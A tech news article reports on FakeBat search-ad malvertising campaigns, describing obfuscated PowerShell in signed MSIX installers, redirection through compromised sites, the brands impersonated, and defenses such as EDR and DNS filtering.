Researchers see a surge in search-based malvertising campaigns. Last month, the cases nearly doubled the documented incidents.
Among the familiar payload deployments, novel evasion tactics emerged, highlighting the evolving landscape of online threats. This is where FakeBat malware enters the scene with its unique technique of payload distribution.
Unveiling FakeBat: A Unique Malware Variant
(Photo : Clint Patterson from Unsplash)
One notable malware strain, FakeBat, garnered attention for its unconventional approach. Employing MSIX installers bundled with heavily obfuscated PowerShell code, threat actors orchestrated sophisticated attacks, according to MalwareBytes.
The malvertiser associated with distributing FakeBat initially relied on predictable URL shorteners. However, recent iterations showcased experimentation with new redirectors, including leveraging legitimate websites to evade security measures.
Related Article: WogRAT Malware Alert: Hackers Abuse Online Notepad to Trigger Malicious Code
Diversification in Campaign Targets
Unlike previous trends that predominantly targeted specific software brands, the latest wave of FakeBat malvertising campaigns exhibits diverse targets. This shift signifies a departure, with threat actors expanding their scope to include numerous brands in their malicious campaigns.
Adaptive Redirection Strategies
Recent FakeBat malvertising campaigns adopted dual redirection tactics. While traditional abuse of URL/analytics shorteners persisted, threat actors also leveraged subdomains from compromised legitimate websites.
Threat actors circumvented detection mechanisms by exploiting the illusion of credibility conferred by these compromised domains.
Active Brand Impersonations
Current campaigns impersonate various reputable brands, including OneNote, Epic Games, Ginger, and the Braavos smart wallet application. Many of these malicious domains are hosted on Russian-based infrastructure, adding a layer of complexity to detection and mitigation efforts.
Persistent Threats and Evolving Payloads
Each downloaded file masquerades as an MSIX installer, complete with a valid digital certificate. Upon execution, a standardized PowerShell script connects to the attacker's command and control server, cataloging victims for future exploitation.
Despite efforts to detect PowerShell execution, threat actors continue to bypass security measures, posing a persistent threat to businesses.
Defense Strategies and Mitigation Efforts
Defending against search-based malvertising requires a multifaceted approach. While efforts to block malicious payloads are essential, addressing supporting infrastructure poses challenges. ThreatDown EDR detects PowerShell execution but remains challenged by the dynamic nature of malvertising tactics.
Implementing robust ad-blocking policies, such as ThreatDown DNS Filter, remains an effective countermeasure to thwart malvertising attacks at their source.
Malvertising Tactics Will Evolve For Years to Come
It is anticipated that search-based malvertising will evolve in the coming years. This will encourage businesses to implement stricter security policies inside.
Understanding the nuances of evolving malware variants and adapting defense strategies accordingly is paramount. By leveraging tested and proven mitigation measures and collaborating with industry partners, organizations can effectively protect their digital assets against threat actors.
In other news, Bumblebee malware created a new buzz during Valentine's Day following its new scheme. Discovered in 2022, researchers believed that the popular Conti ransomware gang from Russia was behind the malware.
Read Also: ScreenConnect Flaw Exploit: North Korean Hackers Infect Targets With Toddleshark Malware
